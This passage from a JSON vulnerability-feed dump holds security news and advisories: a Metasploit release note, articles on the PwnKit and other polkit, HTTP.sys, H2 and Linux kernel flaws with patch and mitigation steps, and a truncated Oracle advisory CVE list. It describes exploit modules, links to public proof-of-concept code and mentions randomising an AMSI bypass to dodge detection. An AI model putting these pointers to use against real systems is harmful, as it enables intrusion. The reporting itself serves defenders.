vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the [module documentation](<https://github.com/rapid7/metasploit-framework/blob/843a7242f4e9a5a868ff26d09428763b643933cc/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md>).\n\n## New module content (4)\n\n * [VMware vCenter Server Virtual SAN Health Check Plugin RCE](<https://github.com/rapid7/metasploit-framework/pull/15383>) by wvu and Ricter Z, which exploits [CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog>) \\- A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user.\n * [Polkit D-Bus Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15368>) by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits [CVE-2021-3560](<https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560?referrer=blog>) \\- A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.\n * [ForgeRock / OpenAM Jato Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15386>) by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464?referrer=blog>) \\- A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability \nin OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.\n * [Windows Process Memory Dump](<https://github.com/rapid7/metasploit-framework/pull/15154>) by smashery - This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.\n\n## Enhancements and features\n\n * [#15217](<https://github.com/rapid7/metasploit-framework/pull/15217>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Removes the Python module `ms17_010_eternalblue_win8.py` and consolidates the functionality into `exploits/windows/smb/ms17_010_eternalblue.rb` \\- which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.\n * [#15254](<https://github.com/rapid7/metasploit-framework/pull/15254>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.\n\n## Bugs fixed\n\n * [#15362](<https://github.com/rapid7/metasploit-framework/pull/15362>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fixes a regression issue with `post/multi/manage/shell_to_meterpreter`, and other interactions with command shell based sessions\n * [#15420](<https://github.com/rapid7/metasploit-framework/pull/15420>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an regression issue were `auxiliary/scanner/ssh/eaton_xpert_backdoor` failed to load correctly\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-08T16%3A19%3A37%2B01%3A00..2021-07-15T10%3A18%3A50%2B01%3A00%22>)\n * [Full diff 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/compare/6.0.52...6.0.53>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T19:47:06", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-35464", "CVE-2021-3560"], "modified": "2021-07-16T19:47:06", "id": "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "href": "https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhI97Ku4vg4Jm_CGDvqtOuK_CPe3ndwAvsWS1laMg7it8hFSVmooGbTIBB-VyzaXv2X-jJ9DJKmHvzWRfu5IHYSqrmxP3PRqh1et84PzAFwrVjrmoJI9gmzgwDInqw1mm_idVrZpVFtMBLpwXlE4ZlWnmOhvXoPsp7JbnyYqziUoHjqiTv6Yrl6lcUH>)\n\nA 12-year-old security vulnerability has been disclosed in a system utility called Polkit that grants attackers root privileges on Linux systems, even as a proof-of-concept (PoC) exploit has emerged in the wild merely hours after technical details of the bug became public.\n\nDubbed \"PwnKit\" by cybersecurity firm Qualys, the weakness impacts a component in polkit called pkexec, a program that's installed by default on every major Linux distribution such as Ubunti, Debian, Fedora, and CentOS.\n\n[Polkit](<https://en.wikipedia.org/wiki/Polkit>) (formerly called **PolicyKit**) is a toolkit for controlling system-wide privileges in Unix-like operating systems, and provides a mechanism for non-privileged processes to communicate with privileged processes.\n\n\"This vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration,\" Bharat Jogi, director of vulnerability and threat research at Qualys, [said](<https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034>), adding it \"has been hiding in plain sight for 12+ years and affects all versions of pkexec since its first version in May 2009.\"\n\nThe flaw, which concerns a case of memory corruption and has been assigned the identifier CVE-2021-4034, was reported to Linux vendors on November 18, 2021, following which patches have been issued by [Debian](<https://security-tracker.debian.org/tracker/CVE-2021-4034>), [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2022-001>), and [Ubuntu](<https://ubuntu.com/security/CVE-2021-4034>).\n\n[pkexec](<https://linux.die.net/man/1/pkexec>), analogous to the [sudo](<https://linux.die.net/man/8/sudo>) command, allows an authorized user to execute commands as another user, doubling as an alternative to sudo. If no username is specified, the command to be executed will be run as the administrative super user, root.\n\nPwnKit stems from an out-of-bounds write that enables the reintroduction of \"unsecure\" environment variables into pkexec's environment. While this vulnerability is not remotely exploitable, an attacker that has already established a foothold on a system via another means can weaponize the flaw to achieve full root privileges.\n\nComplicating matters is the emergence of a PoC in the wild, which CERT/CC vulnerability analyst Will Dormann [called](<https://twitter.com/wdormann/status/1486106541665226753>) \"simple and universal,\" making it absolutely vital that the patches are applied as soon as possible to contain potential threats.\n\nThe development marks the second security flaw uncovered in Polkit in as many years. In June 2021, GitHub security researcher Kevin Backhouse revealed details of a seven-year-old privilege escalation vulnerability ([CVE-2021-3560](<https://thehackernews.com/2021/06/7-year-old-polkit-flaw-lets.html>)) that could be abused to escalate permissions to the root user.\n\nOn top of that, the disclosure also arrives close on the heels of a security flaw affecting the Linux kernel ([CVE-2022-0185](<https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes>)) that could be exploited by an attacker with access to a system as an unprivileged user to escalate those rights to root and break out of containers in Kubernetes setups.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-26T05:39:00", "type": "thn", "title": "12-Year-Old Polkit Flaw Lets Unprivileged Linux Users Gain Root Access", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560", "CVE-2021-4034", "CVE-2022-0185"], "modified": "2022-01-27T04:34:13", "id": "THN:205C973376C6EB6419ADECED2ADA9A25", "href": "https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-02-02T00:00:00", "description": "# The Bug Report - January 2022 \n\nBy Trellix \u00b7 February 2, 2022\n\nThis story was written by Kevin McGrath\n\n#### Your Cybersecurity Comic Relief\n\n[](<https://toggl.com/>) **[Image courtesy of https://toggl.com/](<https://toggl.com/>)**\n\n##### Why am I here?\n\nOmicron is the 15th letter in the Greek alphabet, used by Donald Knuth to denote Big-O notation, represented zero in Ptolemy's Almagest, had the value of 70 in the practice of [isopsephy](<https://en.wikipedia.org/wiki/Isopsephy>). But for most of us, it simply represents the pandemic that _JUST. WILL. NOT. END._ Wait, you weren't interested in philosophical ramblings on the most mentioned word in January of 2022? You actually came here to read about some vulnerabilities? But, but\u2026never mind. Welcome to the January Bug Report: Surge edition! \n\n * CVE-2022-0185: Because Java devs aren't alone in forgetting to validate input!\n * CVE-2021-42392: What? You thought Log4shell would go away?\n * CVE-2022-21907: I didn't forget about you, my little worm.\n * CVE-2021-4034: PwnKit, what happens when you decide sudo is insufficient.\n\n#### CVE-2022-21907: HTTP.sys wormable bug\n\n##### What is it?\n\nFor Patch Tuesday in January 2022, Microsoft welcomed us to this new year with a [wormable vulnerability](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/worming-your-way-in-through-iis-cve-2022-21907.html>) in the HTTP.sys kernel driver. This is **the second wormable vulnerability found in HTTP.sys** in a seven-month span. That's pretty impressive, considering the code maturity of this driver. CVE-2021-31166 didn't implode the internet; hopefully, 21907 won't either! '21907 leverages the incomplete fix from '31166, **taking advantage of HTTP trailer support** (metadata at the end of a chunked message). It's unclear if this exploit relies on the presence of a TRAILER header in the final chunk or not \u2013 [**the RFC denotes it as OPTIONAL**](<https://datatracker.ietf.org/doc/html/rfc7540>). This is potentially a problem for network product signature writers if they can't rely on the TRAILER header.\n\nFun fact: **[_PoCs_](<https://github.com/antx-code/CVE-2022-21907>) [_are_](<https://github.com/nu11secur1ty/Windows10Exploits/blob/master/2022/CVE-2022-21907/PoC/PoC-CVE-2022-21907.py>) [_on_](<https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC>) [_GitHub_](<https://github.com/mauricelambert/CVE-2022-21907>) for this!**\n\nAnother fun fact: **We are beginning to see exploitation in the wild!** If you would like to receive up-to-date information on current threats, McAfee Insights is something you should definitely look into!\n\nWhile it might seem sensible that only IIS uses HTTP.sys, that isn't actually the case. HTTP.sys is the kernel driver that provides core HTTP handling code. Other subsystems make use of this code:\n\n * **ADFS**\n * **WinRM**\n * **Intel Support Assistant**\n\nYou can see what services are leveraging the driver with: \n\nPS &gt; netsh http show servicestate \n--- \n \nThis will list the request queues and URLs associated with them running on the current system.\n\nFortunately for those who haven't bothered to update past Server 2019 or Windows 10 1809, you're in the clear\u2026unless you enabled trailer support in the registry.\n\n##### Who cares?\n\n2.4 million Twitter users. Anyone with IIS running in their environment. Anyone who uses **Docusign** (this is a rather large deal, considering the number of legally binding contracts that flow through Docusign, especially during the pandemic). According to a recent market report, **approximately 7% of Internet sites use IIS**. Even Microsoft doesn't have that many internet-facing systems, meaning there are a lot of sites besides MS using IIS. Oh, and anyone using **vulnerable-by-default versions of Windows**:\n\n * Windows 10 2004 and up (both ARM and x64)\n * Windows Server 20H2 and up\n\n##### What can I do?\n\nPatch! Microsoft released a patch for this vulnerability along with their announcement. Should that not be possible, it would be best to remove those systems from Internet-facing roles. Unfortunately, **there is no host-based mitigation available for current versions of Windows**.\n\nIf you are running Windows Server 1909 or Windows 10 1809, you are **not** vulnerable by default. To determine vulnerability status, execute\n\nPS &gt; Get-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Services\\HTTP\\Parameters\" | Select-Object EnableTrailerSupport \n--- \n \nIf a value is returned and is non-zero, your system is vulnerable. To mitigate this, execute: \n\nPS &gt; Set-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Services\\HTTP\\Parameters\" -name EnableTrailerSupport -Value 0 \n--- \n \nOr simply delete that registry key.\n\n##### The Gold Standard\n\nThe good news is there is a patch available. Please apply it! If you can't apply the patch for\u2026reasons\u2026 don't fret. Trellix has you covered with Network Security Platform **(NSP) signatures** for this vuln. So, make sure you have at least updated your signature database!\n\n \n\n\n#### CVE-2021-42392: H2 wants in on this Log4Shell action!\n\n##### What is it?\n\nA Log4Shell-like [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2021-42392>) in the handling of JNDI remote class loading. While it does not leverage the bug present in Log4j (Log4j is not even required), it leverages the same **underlying technology (JNDI)**. Any attacker-controlled URL that manages to get to the database (you sanitized your input, though\u2026Right?) can gain **remote code execution** in the context of the H2 RDBMS. But of course, that won't happen to you because all queries against the database are sanitized, parameterized, and stored. Obviously. \n\n##### Who cares?\n\nSome estimates put the **usage of H2 at [nearly](<https://mvnrepository.com/artifact/com.h2database/h2>) 7,000 projects \u2013 including Log4J**. Makes you wonder if Log4jJ was ever really the problem at all, eh? Log4Shell may need renaming and have legs beyond Log4j users if that's the case. Nature always finds a way\u2026\n\n##### What can I do?\n\nH2 database versions 1.1.100 to 2.0.204 are impacted. Version 2.0.206, shipped on January 5th, 2022, remediates this vulnerability. Updating to at least version 2.0.206 would be ideal.\n\nYou could switch database engines, but that seems rather an extreme solution. Curing the disease by killing the host isn't recommended practice in IT any more than in medicine.\n\nYou could also stop using Java? While it seems similar to the above, in this case, it seems warranted. In fact, this is the best solution, clearly. Java belongs in coffee cups, not on servers.\n\n##### The Gold Standard\n\nIf patching, scrapping all Java code and switching to some other language, or swapping database engines is not possible, Trellix has you covered, as the exploits themselves will look very similar to Log4Shell.\n\nTrellix customers are [protected](<https://kcm.trellix.com/agent/index?page=content&id=KB95091>) from many different angles (for the specifics, please visit [this](<https://kcm.trellix.com/agent/index?page=content&id=KB95091>) Knowledge Base article): \n\n * Expert Rules on Endpoint Security (ENS) can pick up dangerous patterns in memory, as described in this [blog](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/log4j-and-the-memory-that-knew-too-much.html>). \n * Endpoint Security (ENS), VirusScan Enterprise (VSE), McAfee Web Gateway (MWG) can provide generic detection under the tile Exploit-CVE-2021-44228.C via a \"Potentially Unwanted Software\" detection. This detection is also augmented by a list of hashes of samples related to in-the-wild campaigns exploiting this vulnerability. \n * Network Security Platform (NSP) can also detect the attack via User-Defined signature (provided in the KB article linked previously) \n * MVISION Endpoint Detection and Response (EDR), McAfee Active Response (MAR) can also be used to look for vulnerable systems with Real-Time Search (RTS) queries \n * McAfee SIEM got an update (Exploit Content Pack version 4.1.0) that will raise an alarm on potential exploit attempts. \n\n \n\n\n#### CVE-2022-0185: Linux kernel namespace underfl\u2026\n\n##### What is it?\n\nOn its surface, [CVE-2022-0185](<https://ubuntu.com/security/CVE-2022-0185>) is a simple integer underflow in a legacy code path. Fortunately for anyone using containers, that legacy code path is in the File System Context (FSC). While the FSC was replaced with the File Context API (FCAPI), some functionality was retained to support backwards compatibility \u2013 including the vulnerable path. The **integer underflow creates an unbounded write** for an attacker in the context of the container process itself. An attacker with access to a container can leverage this flaw to **attack the underlying host, gaining access to all other containers running on this node**. Given how popular tools like Kubernetes (k8s) have become, this is potentially concerning for anyone who uses containers for process isolation in the presence of untrusted users. This issue only affects containers using unprivileged namespaces, containers that allow the [unshare](<https://www.bleepingcomputer.com/news/security/linux-kernel-bug-can-let-hackers-escape-kubernetes-containers/>) command, or containers with the CAP_SYS_ADMIN privilege (off by default). The unshare command is blocked by default on Docker containers by the seccomp filter. Unfortunately for k8s users, **the seccomp filter is not on by default**, meaning any Kubernetes cluster is at risk.\n\nThe past is a garrote around the neck of progress, slowly strangling the life from all that is good in this world. In other words, backwards compatibility is frequently why we can't have nice things.\n\n##### Who cares?\n\nAnyone running a container, potentially. And even admins who aren't but allow users to run them. Or even using a container to store leftovers in \u2013 ok, that may be taking it too far. At the least, anyone running a container on a shared server should be very concerned about this, potentially removing anything mission-critical from that server until they know the underlying kernel has been updated.\n\nThe authors have written a [detailed blog](<https://www.willsroot.io/2022/01/cve-2022-0185.html>) and [released PoC code](<https://github.com/Crusaders-of-Rust/CVE-2022-0185/blob/master/exploit_kctf.c>) for this vulnerability. So, at this point, we all should care, as it\u2019s only a matter of time before malicious actors weaponize it.\n\n##### What can I do?\n\nIf you control the host, you need to update the kernel. If that's not an option (or the owner refuses), executing\n\n# sysctl -w kernel.unprivileged_userns_clone = 0 \n--- \n \nwill limit this vulnerability to only those containers with the CAP_SYS_ADMIN privilege. Removing that privilege from your containers will also mitigate this vulnerability (it is off by default).\n\nThe Redhat recommendation for systems which don\u2019t run containers is to simply disable namespaces entirely:\n\n# echo \"user.max_user_namespaces=0\" &gt; /etc/sysctl.d/userns.conf \n# sysctl -p /etc/sysctl.d/userns.conf \n--- \n \nThis also **renders that host unable to run containers**. Which, if you aren't using them, is probably a good idea anyway.\n\n##### The Gold Standard\n\nAt this point, patching or applying mitigations are your best options. Since containers are used as an isolation mechanism, an external process having visibility into a running container is unlikely. Ensure you run on a patched host or **enable the seccomp filter** on k8s. \n\n \n\n\n#### CVE-2021-4034: PwnKit\n\n##### What is it?\n\nCVE-2021-4034, affectionately known as PwnKit, leverages a logic bug in PolKit (formerly known as PolicyKit). PolKit is a system-wide policy management kit which provides unprivileged processes safe (or so it was believed) access to privileged processes. **The bug exists specifically in the tool pkexec** (because for some reason sudo wasn\u2019t enough, and we felt the need for _another_ setuid program to do\u2026 precisely the same thing as sudo) \u2013 an assumption is made that the argc variable is at least 1. In typical program invocation, this is obviously true. There are ways\u2026nearly all of which are indications of compromise and should be rejected by the runtime, but, hey, here we are!\n\nTypically, when using pkexec, a pop-up window appears asking for credentials. This vulnerability **bypasses that credential check** and just runs as root. Because clearly, the way to handle failure is to just hand over the keys to the kingdom and pat yourself on the back! \n\nThis is the second polkit vulnerability in 6 months. [CVE-2021-3560](<https://access.redhat.com/security/cve/CVE-2021-3560>) also bypassed the credential check using the dbus mechanism to invoke polkit. Both seem to have leveraged the same root flaw. While we\u2019re on the subject, the root cause was [initially](<https://ryiron.wordpress.com/2013/12/16/argv-silliness/>) reported in 2013, but the author didn\u2019t see a direct path to exploitation. And so, the patch languished in forsaken misery, awaiting its day to shine. It took nine long years, but shine on sweet patch! Embrace your time in the sun!\n\n##### Who cares?\n\nIt would be hard to **argue** this isn\u2019t the biggest local privilege escalation bug of the last year (get it?). This vulnerability works on most major Linux distributions running out-of-date polkit binaries, so anyone running Linux who hasn\u2019t patched since January 25th is vulnerable. The version numbers of polkit are a little wonky, as Debian maintains its own fork, but if you are running\n\n * less than 0.105-26ubuntu1.2 on Ubuntu 20.04 (LTS),\n * less than 0.105-31ubuntu0.1 on Ubuntu 21.10,\n * less than 0.105-31+deb11u1 on Debian bullseye, or\n * less than polkit-0.115-11.el8_4.2 on RedHat Enterprise Linux (RHEL) 8.4 EUS\n\nthen you are vulnerable. Again, you are vulnerable if you haven\u2019t patched since January 25th. There\u2019s also [PoC code](<https://haxx.in/files/blasty-vs-pkexec.c>) in the wild, so it won\u2019t be long before this is actively exploited. \n\nOh, you trust all of your users? In that case, you have nothing to worry about. Compromised accounts are readily available. Whether it was through phishing, cracking, compromised accounts elsewhere that share the same credentials, or some other avenue of account compromise, trusting users isn\u2019t an indication that you should trust user accounts.\n\nWhile this bug was found on Linux, other UNIX distributions use polkit, including the BSDs. OpenBSD, at least, has always had mitigations in place for this \u2013 it refuses to execute a program with an argc of 0. Solaris also uses polkit, but Oracle is so secretive about Solaris that they have a paywall up even on security bulletins. Because clearly, that\u2019s the best way to hold on to customers!\n\n##### What can I do?\n\nUpdate! The patches are available from all major Linux vendors and should be applied. No reboots are required. If you choose instead to not patch, you can remove the setuid bit on pkexec:\n\n# chmod 0755 /usr/bin/pkexec \n--- \n \nUnfortunately, this will also break pkexec from doing what it was designed to do. But better that than compromise, right? \n\nRedHat has a specific-to-RHEL mitigation guide in its [security bulletin](<https://access.redhat.com/security/cve/CVE-2021-4034>). \n\n##### The Gold Standard\n\nSince this was a coordinated release from all the Linux distributions, it really should just be applied. It\u2019s worth pointing out that anomalous login points-of-origin should be recorded, flagged, and possibly blocked without some other form of authentication. You are using multi-factor authentication, right? MFA would stop non-insider-threats from exploiting this, as they wouldn\u2019t be able to access the system. As for insider threats, well, that\u2019s left as an exercise for the reader.\n", "cvss3": {}, "published": "2022-02-02T00:00:00", "type": "trellix", "title": "The Bug Report - January 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31166", "CVE-2021-3560", "CVE-2021-4034", "CVE-2021-42392", "CVE-2021-44228", "CVE-2022-0185", "CVE-2022-21907"], "modified": "2022-02-02T00:00:00", "id": "TRELLIX:39F5630F37B0A70500113404A73FE414", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-january-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "oracle": [{"lastseen": "2023-09-30T02:41:45", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 342 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2788740.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0881", "CVE-2015-0254", "CVE-2016-0762", "CVE-2016-4429", "CVE-2017-14735", "CVE-2017-16931", "CVE-2017-3735", "CVE-2017-5461", "CVE-2017-5637", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-9735", "CVE-2018-0737", "CVE-2018-0739", "CVE-2018-15686", "CVE-2018-21010", "CVE-2018-7160", "CVE-2018-7183", "CVE-2019-0190", "CVE-2019-0201", "CVE-2019-0205", "CVE-2019-0210", "CVE-2019-0219", "CVE-2019-0228", "CVE-2019-10086", "CVE-2019-10173", "CVE-2019-10746", "CVE-2019-11358", "CVE-2019-12260", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12973", "CVE-2019-13990", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17195", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17545", "CVE-2019-17566", "CVE-2019-20330", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2897", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5063", "CVE-2019-5064", "CVE-2020-10543", "CVE-2020-10683", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11612", "CVE-2020-11868", "CVE-2020-11973", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-11988", "CVE-2020-11998", "CVE-2020-12723", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-13949", "CVE-2020-13956", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14756", "CVE-2020-15389", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1967", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24553", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-2555", "CVE-2020-25638", "CVE-2020-25648", "CVE-2020-25649", "CVE-2020-2604", "CVE-2020-26217", "CVE-2020-26870", "CVE-2020-27193", "CVE-2020-27216", "CVE-2020-27218", "CVE-2020-27783", "CVE-2020-27814", "CVE-2020-27841", "CVE-2020-27842", "CVE-2020-27843", "CVE-2020-27844", "CVE-2020-27845", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28928", "CVE-2020-29582", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-7016", "CVE-2020-7017", "CVE-2020-7712", "CVE-2020-7733", "CVE-2020-7760", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9484", "CVE-2020-9489", "CVE-2021-20190", "CVE-2021-20227", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21341", "CVE-2021-21342", "CVE-2021-21343", "CVE-2021-21344", "CVE-2021-21345", "CVE-2021-21346", "CVE-2021-21347", "CVE-2021-21348", "CVE-2021-21349", "CVE-2021-21350", "CVE-2021-21351", "CVE-2021-21409", "CVE-2021-22112", "CVE-2021-22118", "CVE-2021-2244", "CVE-2021-22876", "CVE-2021-22883", "CVE-2021-22884", "CVE-2021-22890", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-2323", "CVE-2021-2324", "CVE-2021-2326", "CVE-2021-2328", "CVE-2021-2329", "CVE-2021-2330", "CVE-2021-2333", "CVE-2021-23336", "CVE-2021-2334", "CVE-2021-2335", "CVE-2021-2336", "CVE-2021-2337", "CVE-2021-2338", "CVE-2021-2339", "CVE-2021-2340", "CVE-2021-2341", "CVE-2021-2342", "CVE-2021-2343", "CVE-2021-2344", "CVE-2021-2345", "CVE-2021-2346", "CVE-2021-2347", "CVE-2021-2348", "CVE-2021-2349", "CVE-2021-2350", "CVE-2021-2351", "CVE-2021-2352", "CVE-2021-2353", "CVE-2021-2354", "CVE-2021-2355", "CVE-2021-2356", "CVE-2021-2357", "CVE-2021-2358", "CVE-2021-2359", "CVE-2021-2360", "CVE-2021-2361", "CVE-2021-2362", "CVE-2021-2363", 